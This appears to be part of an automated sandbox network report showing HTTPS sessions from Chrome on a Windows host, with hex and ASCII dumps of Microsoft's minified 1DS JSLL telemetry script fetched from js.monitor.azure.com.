                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 29 2c 68 28 29 2c 6d 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f
                                                                                                                                                                                                Data Ascii: ),h(),m(e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reaso
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 28 7b 4e 6f 72 6d 61 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74
                                                                                                                                                                                                Data Ascii: ({Normal:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}ret
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 28 6f 2c 22 41 75 74 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75
                                                                                                                                                                                                Data Ascii: (o,"Auto track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=fu
                                                                                                                                                                                                2024-11-24 02:04:50 UTC16384INData Raw: 63 6f 6e 66 69 67 2e 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73
                                                                                                                                                                                                Data Ascii: config.coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._s
                                                                                                                                                                                                2024-11-24 02:04:51 UTC16384INData Raw: 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74
                                                                                                                                                                                                Data Ascii: e)return!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t
                                                                                                                                                                                                2024-11-24 02:04:51 UTC16384INData Raw: 67 3d 22 57 65 62 41 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22
                                                                                                                                                                                                Data Ascii: g="WebAuthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split"
                                                                                                                                                                                                2024-11-24 02:04:51 UTC16384INData Raw: 61 28 65 5b 6d 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f
                                                                                                                                                                                                Data Ascii: a(e[mv])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                28192.168.2.54976013.107.246.634436608C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-24 02:04:53 UTC370OUTGET /scripts/c/ms.jsll-4.min.js HTTP/1.1
                                                                                                                                                                                                Host: js.monitor.azure.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                2024-11-24 02:04:53 UTC889INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sun, 24 Nov 2024 02:04:53 GMT
                                                                                                                                                                                                Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                Content-Length: 207935
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: no-transform, public, max-age=1800, immutable
                                                                                                                                                                                                Last-Modified: Mon, 14 Oct 2024 17:27:31 GMT
                                                                                                                                                                                                ETag: 0x8DCEC757C1AD1D1
                                                                                                                                                                                                x-ms-request-id: 24663fe8-301e-00d3-0bb2-2cfca8000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-meta-jssdkver: 4.3.3
                                                                                                                                                                                                x-ms-meta-jssdksrc: [cdn]/scripts/c/ms.jsll-4.3.3.min.js
                                                                                                                                                                                                Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,x-ms-meta-jssdkver,x-ms-meta-jssdksrc,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                x-azure-ref: 20241124T020453Z-178bfbc474bfw4gbhC1NYCunf400000005ag0000000097c7
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache-Info: L1_T2
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-24 02:04:53 UTC15495INData Raw: 2f 2a 21 0a 20 2a 20 31 44 53 20 4a 53 4c 4c 20 53 4b 55 2c 20 34 2e 33 2e 33 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 4d 69 63 72 6f 73 6f 66 74 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 28 4d 69 63 72 6f 73 6f 66 74 20 49 6e 74 65 72 6e 61 6c 20 4f 6e 6c 79 29 0a 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 21 3d 6e 29 74 28 65 78 70 6f 72 74 73 29 3b 65 6c 73 65 20 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69
                                                                                                                                                                                                Data Ascii: /*! * 1DS JSLL SKU, 4.3.3 * Copyright (c) Microsoft and contributors. All rights reserved. * (Microsoft Internal Only) */!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&defi
                                                                                                                                                                                                2024-11-24 02:04:53 UTC16384INData Raw: 28 69 29 3a 28 72 3d 66 65 28 22 63 6f 6e 73 6f 6c 65 22 29 29 26 26 28 72 2e 65 72 72 6f 72 7c 7c 72 2e 6c 6f 67 29 28 74 2c 63 65 28 69 29 29 29 29 7d 53 65 28 61 3d 7b 74 68 65 6e 3a 6f 2c 22 63 61 74 63 68 22 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6f 28 75 6e 64 65 66 69 6e 65 64 2c 65 29 7d 2c 22 66 69 6e 61 6c 6c 79 22 3a 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 65 3d 74 2c 6e 3d 74 3b 72 65 74 75 72 6e 20 51 28 74 29 26 26 28 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 26 26 74 28 29 2c 65 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 72 6f 77 20 74 26 26 74 28 29 2c 65 7d 29 2c 6f 28 65 2c 6e 29 7d 7d 2c 22 73 74 61 74 65 22 2c 7b 67 65 74 3a 64 7d 29 2c 68 74 28 29 26 26 28 61 5b 6d 74 28
                                                                                                                                                                                                Data Ascii: (i):(r=fe("console"))&&(r.error||r.log)(t,ce(i))))}Se(a={then:o,"catch":function(e){return o(undefined,e)},"finally":function(t){var e=t,n=t;return Q(t)&&(e=function(e){return t&&t(),e},n=function(e){throw t&&t(),e}),o(e,n)}},"state",{get:d}),ht()&&(a[mt(
                                                                                                                                                                                                2024-11-24 02:04:53 UTC16384INData Raw: 28 65 2c 74 2c 6e 2c 72 29 7b 67 65 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 26 26 65 5b 74 5d 26 26 28 6e 3f 28 6e 2e 63 62 5b 74 65 5d 28 7b 66 6e 3a 72 2c 61 72 67 3a 65 7d 29 2c 6e 2e 68 3d 6e 2e 68 7c 7c 6e 6e 28 70 63 2c 30 2c 6e 29 29 3a 4d 28 72 2c 5b 65 5d 29 29 7d 29 7d 68 63 2e 5f 5f 69 65 44 79 6e 3d 31 3b 76 61 72 20 76 63 3d 68 63 3b 66 75 6e 63 74 69 6f 6e 20 68 63 28 65 29 7b 74 68 69 73 2e 6c 69 73 74 65 6e 65 72 73 3d 5b 5d 3b 76 61 72 20 6e 2c 69 3d 5b 5d 2c 61 3d 7b 68 3a 6e 75 6c 6c 2c 63 62 3a 5b 5d 7d 2c 6f 3d 76 6f 28 65 2c 64 63 29 5b 4b 6e 5d 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6e 3d 21 21 65 2e 63 66 67 2e 70 65 72 66 45 76 74 73 53 65 6e 64 41 6c 6c 7d 29 3b 76 65 28 68 63 2c 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                Data Ascii: (e,t,n,r){ge(e,function(e){e&&e[t]&&(n?(n.cb[te]({fn:r,arg:e}),n.h=n.h||nn(pc,0,n)):M(r,[e]))})}hc.__ieDyn=1;var vc=hc;function hc(e){this.listeners=[];var n,i=[],a={h:null,cb:[]},o=vo(e,dc)[Kn](function(e){n=!!e.cfg.perfEvtsSendAll});ve(hc,this,function(
                                                                                                                                                                                                2024-11-24 02:04:53 UTC16384INData Raw: 28 65 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 61 2e 66 6c 75 73 68 43 6f 6d 70 6c 65 74 65 3d 65 2c 50 3d 21 30 2c 52 2e 72 75 6e 28 6f 2c 61 29 2c 66 5b 67 72 5d 28 29 2c 6f 5b 6c 72 5d 28 61 29 7d 2c 36 2c 6e 29 2c 69 7d 2c 66 5b 6f 72 5d 3d 73 2c 66 2e 61 64 64 50 6c 75 67 69 6e 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 6f 75 29 3b 76 61 72 20 69 3d 73 28 65 5b 24 6e 5d 29 3b 69 66 28 69 26 26 21 74 29 72 65 74 75 72 6e 20 72 26 26 72 28 21 31 29 2c 76 6f 69 64 20 43 28 22 50 6c 75 67 69 6e 20 5b 22 2b 65 5b 24 6e 5d 2b 22 5d 20 69 73 20 61 6c 72 65 61 64 79 20 6c 6f 61 64 65 64 21 22 29 3b 76 61 72 20 61 2c 6f 3d 7b 72 65 61 73 6f 6e 3a 31 36 7d 3b 66
                                                                                                                                                                                                Data Ascii: (e,function(e){a.flushComplete=e,P=!0,R.run(o,a),f[gr](),o[lr](a)},6,n),i},f[or]=s,f.addPlugin=function(e,t,n,r){if(!e)return r&&r(!1),void C(ou);var i=s(e[$n]);if(i&&!t)return r&&r(!1),void C("Plugin ["+e[$n]+"] is already loaded!");var a,o={reason:16};f
                                                                                                                                                                                                2024-11-24 02:04:53 UTC16384INData Raw: 6c 3a 31 2c 43 72 69 74 69 63 61 6c 3a 32 7d 29 2c 75 6e 64 65 66 69 6e 65 64 2c 75 6e 64 65 66 69 6e 65 64 29 2c 53 6c 3d 22 22 3b 66 75 6e 63 74 69 6f 6e 20 78 6c 28 65 29 7b 74 72 79 7b 69 66 28 6f 65 28 6f 74 28 29 29 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 76 61 72 20 74 3d 28 6e 65 77 20 44 61 74 65 29 5b 4f 73 5d 28 29 2c 6e 3d 66 65 28 65 3d 3d 3d 45 6c 2e 4c 6f 63 61 6c 53 74 6f 72 61 67 65 3f 22 6c 6f 63 61 6c 53 74 6f 72 61 67 65 22 3a 22 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 22 29 2c 72 3d 53 6c 2b 74 2c 69 3d 28 6e 2e 73 65 74 49 74 65 6d 28 72 2c 74 29 2c 6e 2e 67 65 74 49 74 65 6d 28 72 29 21 3d 3d 74 29 3b 69 66 28 6e 5b 52 73 5d 28 72 29 2c 21 69 29 72 65 74 75 72 6e 20 6e 7d 63 61 74 63 68 28 61 29 7b 7d 72 65 74 75 72 6e 20 6e 75 6c
                                                                                                                                                                                                Data Ascii: l:1,Critical:2}),undefined,undefined),Sl="";function xl(e){try{if(oe(ot()))return null;var t=(new Date)[Os](),n=fe(e===El.LocalStorage?"localStorage":"sessionStorage"),r=Sl+t,i=(n.setItem(r,t),n.getItem(r)!==t);if(n[Rs](r),!i)return n}catch(a){}return nul
                                                                                                                                                                                                2024-11-24 02:04:53 UTC16384INData Raw: 6f 20 74 72 61 63 6b 20 70 61 67 65 20 76 69 73 69 74 20 74 69 6d 65 20 66 61 69 6c 65 64 2c 20 6d 65 74 72 69 63 20 77 69 6c 6c 20 6e 6f 74 20 62 65 20 63 6f 6c 6c 65 63 74 65 64 3a 20 22 2b 63 65 28 72 29 29 7d 7d 2c 59 28 65 2c 22 5f 6c 6f 67 67 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 7d 29 2c 59 28 65 2c 22 70 61 67 65 56 69 73 69 74 54 69 6d 65 54 72 61 63 6b 69 6e 67 48 61 6e 64 6c 65 72 22 2c 7b 67 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 63 7d 7d 29 7d 29 7d 76 61 72 20 4e 64 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 74 68 69 73 5b 67 64 5d 3d 50 74 28 29 2c 74 68 69 73 2e 70 61 67 65 4e 61 6d 65 3d 65 2c 74 68 69 73 2e 70 61 67 65 55 72 6c 3d 74 7d 2c 44 64 3d 66 75 6e 63 74 69 6f 6e 28
                                                                                                                                                                                                Data Ascii: o track page visit time failed, metric will not be collected: "+ce(r))}},Y(e,"_logger",{g:function(){return o}}),Y(e,"pageVisitTimeTrackingHandler",{g:function(){return c}})})}var Nd=function(e,t){this[gd]=Pt(),this.pageName=e,this.pageUrl=t},Dd=function(
                                                                                                                                                                                                2024-11-24 02:04:54 UTC16384INData Raw: 63 6f 72 65 44 61 74 61 2c 22 62 65 68 61 76 69 6f 72 22 29 2c 75 65 28 6e 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 6e 2e 70 61 67 65 54 79 70 65 29 2c 75 65 28 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 26 26 21 75 65 28 65 2e 70 61 67 65 54 79 70 65 29 26 26 28 65 2e 70 61 67 65 54 79 70 65 3d 72 2e 5f 70 61 67 65 54 79 70 65 4d 65 74 61 54 61 67 29 2c 75 65 28 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 26 26 28 65 2e 6d 61 72 6b 65 74 3d 72 2e 5f 6d 61 72 6b 65 74 4d 65 74 61 54 61 67 29 2c 65 2e 69 73 4c 6f 67 67 65 64 49 6e 3d 47 64 28 72 2e 5f 63 6f 6e 66 69 67 29 2c 74 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 3d 6f 63 28 29 7d 2c 69 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 73 65 74 50 61 67 65 54
                                                                                                                                                                                                Data Ascii: coreData,"behavior"),ue(n.pageType)&&(e.pageType=n.pageType),ue(r._pageTypeMetaTag)&&!ue(e.pageType)&&(e.pageType=r._pageTypeMetaTag),ue(r._marketMetaTag)&&(e.market=r._marketMetaTag),e.isLoggedIn=Gd(r._config),t.cookieEnabled=oc()},ip.prototype._setPageT
                                                                                                                                                                                                2024-11-24 02:04:54 UTC16384INData Raw: 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 57 69 74 68 44 61 74 61 42 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 7e 74 5b 6e 5d 2e 6e 61 6d 65 2e 69 6e 64 65 78 4f 66 28 22 64 61 74 61 2d 62 69 2d 22 29 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 41 70 2e 70 72 6f 74 6f 74 79 70 65 2e 5f 69 73 54 72 61 63 6b 65 64 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 65 2e 61 74 74 72 69 62 75 74 65 73 2c 6e 3d 30 3b 6e 3c 74 2e 6c 65 6e 67 74 68 3b 6e 2b 2b 29 69 66 28 22 64 61 74 61 2d 6d 22 3d 3d 3d 74 5b 6e 5d 2e 6e 61 6d
                                                                                                                                                                                                Data Ascii: n!0;return!1},Ap.prototype._isTrackedWithDataBi=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if(~t[n].name.indexOf("data-bi-"))return!0;return!1},Ap.prototype._isTracked=function(e){for(var t=e.attributes,n=0;n<t.length;n++)if("data-m"===t[n].nam
                                                                                                                                                                                                2024-11-24 02:04:54 UTC16384INData Raw: 75 74 68 54 6f 6b 65 6e 22 2c 61 3d 22 41 75 74 68 58 54 6f 6b 65 6e 22 2c 67 67 3d 22 6d 73 66 70 63 22 2c 76 67 3d 22 75 73 65 72 22 2c 68 67 3d 22 61 6c 6c 6f 77 52 65 71 75 65 73 74 53 65 6e 64 69 6e 67 22 2c 6d 67 3d 22 66 69 72 73 74 52 65 71 75 65 73 74 53 65 6e 74 22 2c 79 67 3d 22 73 68 6f 75 6c 64 41 64 64 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 73 22 2c 43 67 3d 22 67 65 74 43 6c 6f 63 6b 53 6b 65 77 48 65 61 64 65 72 56 61 6c 75 65 22 2c 62 67 3d 22 73 65 74 43 6c 6f 63 6b 53 6b 65 77 22 2c 79 65 3d 22 6c 65 6e 67 74 68 22 2c 54 67 3d 22 63 6f 6e 63 61 74 22 2c 49 67 3d 22 69 4b 65 79 22 2c 45 67 3d 22 63 6f 75 6e 74 22 2c 5f 67 3d 22 65 76 65 6e 74 73 22 2c 53 67 3d 22 70 75 73 68 22 2c 78 67 3d 22 73 70 6c 69 74 22 2c 4e 67 3d 22 73 70
                                                                                                                                                                                                Data Ascii: uthToken",a="AuthXToken",gg="msfpc",vg="user",hg="allowRequestSending",mg="firstRequestSent",yg="shouldAddClockSkewHeaders",Cg="getClockSkewHeaderValue",bg="setClockSkew",ye="length",Tg="concat",Ig="iKey",Eg="count",_g="events",Sg="push",xg="split",Ng="sp
                                                                                                                                                                                                2024-11-24 02:04:54 UTC16384INData Raw: 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28 65 2c
                                                                                                                                                                                                Data Ascii: )),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(e,


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                29192.168.2.54975713.107.246.634436608C:\Program Files\Google\Chrome\Application\chrome.exe
